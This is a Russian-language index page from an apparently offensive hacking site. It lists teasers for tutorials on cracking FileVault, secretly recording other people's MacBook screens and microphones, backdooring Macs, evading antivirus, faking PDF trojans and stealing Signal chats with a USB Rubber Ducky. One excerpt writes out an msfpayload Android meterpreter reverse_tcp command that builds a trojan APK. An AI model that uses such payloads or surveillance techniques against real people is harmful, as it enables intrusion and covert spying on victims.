Июль 20, 2019
Домой Обучение (страницы 6)

Обучение


Как проникнуть в MacBook, зашифрованный с помощью FileVault

Не думайте, что если ваш MacBook использует шифрование диска FileVault,, то ваше устройство защищено от хакерских атак. Сегодня вы выясните, достаточно ли у вас сильный пароль для FileVault и сможет ли он противостоять атаке целеустремленного хакера. FileVault, созданный Apple в 2003 году, представляет собой функцию шифрования жесткого диска, встроенную в операционные системы Mac. Шифрование помогает защититься от атак с физическим доступом …

Как удаленно записывать данные с экрана чужого MacBook’а

Стримить видео с экрана чужого MacBook’а можно без использования приложений для шаринга экранов и без открытия каких-либо портов на целевом устройстве. Хакер с низким уровнем пользовательских прав может в режиме реального времени видеть на забэкдоренном Mac’е каждое действие своей жертвы независимо от того, где они находятся. Мы продолжаем серию статей по взломам macOS. Сегодня мы покажем, как скрытно делать видеозапись …


Как удаленно прослушивать микрофон на чьем-нибудь Macbook’е

Google, Amazon и Facebook всегда слушают. Что может быть хуже? Хакеры, кстати, тоже слушают. Особенно уязвимы ПК с Windows. С помощью нескольких простых команд хакер может удаленно захватить микрофон на чем-то Mac’е, а затем, используя потоковое аудио в режиме реального времени прослушивать частные разговоры без ведома жертвы, злоупотребляя халатным отношением к вопросам безопасности. После того, как хакер установит бэкдор на уязвимом MacBook …

Как удаленно взломать Android с помощью Kali

Привет, хакеры! Добро пожаловать на наш сайт. В этой статье мы расскажем, как взломать Android-телефон с помощью Kali. Мы не нашли ни одного туториала по использованию этого хака/эксплоита, поэтому и решили написать его сами. Возможно, вы уже о нем знаете. Шаг 1. Запустите Кали Откройте терминал, и создайте файл Trojan.apk Вы можете сделать это, набрав: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > …

Как сделать неуловимую полезную нагрузку. Часть 2. Скрытие полезной нагрузки

После того, как хакер создал PowerShell-полезную нагрузку, чтобы обойти антивирусное программное обеспечение, и настроил msfconsole на своей машине, он может перейти к следующему шагу — маскировке своего исполняемого файла, чтобы он выглядел как обычный текстовый. Вот так он и вынуждает ничего не подозревающих пользователей Windows 10 открывать полезную нагрузку. Полезная нагрузка для PowerShell, генерируемая Unicorn, работает на целевой машине Windows …

Как сделать неуловимую полезную нагрузку . Часть 1 . Обходя антивирусы

Хакеры всегда ищут эксплоиты, против которых еще не создано противоядие (т.н. zero-day), и которые еще могут успешно обойти функции безопасности Windows 10. Были проведены обширные исследования по созданию необнаруживаемых вредоносных программ и анализ целых проектов на GitHub, предназначенных для автоматизации создания необнаруживаемых полезных нагрузок, таких как WinPaylods, Veil v3 и TheFatRat. Используя приемы социальной инженерии, можно обмануть целевого пользователя и вынудить его открыть вредоносный …

Как украсть переписку из мессенджера Signal на MacBook при помощи USB-утенка

Разработанный в недрах Open Whisper Systems мессенджер Signal — это бесплатное приложение с открытым исходным кодом, предназначенное для шифрования коммуникаций, как для мобильных устройств, так и для десктопов. Оно позволяет пользователям совершать голосовые звонки, отправлять сообщения и даже делать видеозвонки. Однако недавно была обнаружена уязвимость в десктопной версии, которую можно превратить в полезную нагрузку для USB-утенка (USB Rubber Ducky) и украсть …

Как сделать фальшивый PDF-файл с трояном на AppleScript.Часть 2. Маскируем скрипт

Создав macOS-стейджера и разместив на своем сервере «слушателя» Empire, хакер может создать вредоносный AppleScript, а затем замаскировать его под обычный PDF-файл, используя несколько приемов работы с юникодом и иконками. Для этой атаки необходим реальный PDF-файл. Файлы размером более 1 МБ будут слишком большими и заставят пользователя задуматься о причинах такого размера. Настоящий PDF-файл будет каждый раз скачиваться, когда жертва будет …

Как создать фальшивый PDF-файл с трояном на AppleScript.Часть 1. Создание stager-нагрузки

Большинство хакеров используют многочисленные уязвимости в продуктах компании Adobe, чтобы доставлять полезные нагрузки пользователям Windows через зараженные PDF-файлы. Однако не все знают, что вредоносные PDF-файлы также могут нанести ущерб пользователям Mac, использующим дефолтное приложение для предварительного просмотра PDF. Поэтому дважды подумайте, прежде чем кликнуть по PDF-файлу на вашем MacBook’е — он может оказаться трояном, содержащим внутри руткит. В этой мини-серии …

Как настроить бэкдор на чьем угодно MacBook’е

Холивары о том, какая операционная система наиболее безопасна — macOS или Windows — вечная тема. Большинство скажут, что macOS более безопасен, но мы продемонстрируем, как сделать бэкдор на MacBook менее чем за две минуты, а затем просто поддерживать обратный шелл с помощью инструментов, уже встроенных в macOS. Windows 10 определенно не является эталоном безопасности, но в этой и последующих статьях …

Страница 6 из 11Первый...45678 10...Последние
Подпишись на обновления!

Реклама